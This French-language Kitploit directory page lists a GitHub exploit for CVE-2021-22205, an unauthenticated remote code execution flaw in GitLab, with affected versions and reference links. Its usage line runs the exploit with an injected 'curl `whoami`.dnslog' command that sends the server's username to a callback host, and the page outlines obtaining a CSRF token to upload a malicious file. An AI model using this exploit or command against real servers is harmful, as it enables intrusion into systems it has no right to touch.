Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-22205 — CVE-2021-22205 RCE non autorisé | Kitploit
Outils/GitHubGitHub/r0exper/cve-2021-22205
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubr0exper/cve-2021-22205

CVE-2021-22205

CVE-2021-22205 RCE non autorisé

Voir le dépôt
69272il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-22205

Versions affectées :

  • Gitlab CE/EE < 13.10.3
  • Gitlab CE/EE < 13.9.6
  • Gitlab CE/EE < 13.8.8

Utilisation

root@kitploit:~
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

Xnip2021-10-28_21-54-04

Obtenir le jeton CSRF :

Xnip2021-10-28_21-44-31

Obtenez le jeton CSRF via /users/sign_in, puis utilisez le PoC CVE-2021-22205 précédent pour construire un paquet de téléchargement et exécuter une requête de téléchargement non authentifiée, aboutissant à une exécution de code à distance (RCE).

Xnip2021-10-28_21-43-13

Références :

  • https://hackerone.com/reports/1154542
  • https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
  • https://forum.ywhack.com/viewthread.php?tid=115611
  • https://forum.ywhack.com/viewthread.php?tid=116706
Télécharger l’outil
  • https://github.com/RedTeamWing/CVE-2021-22205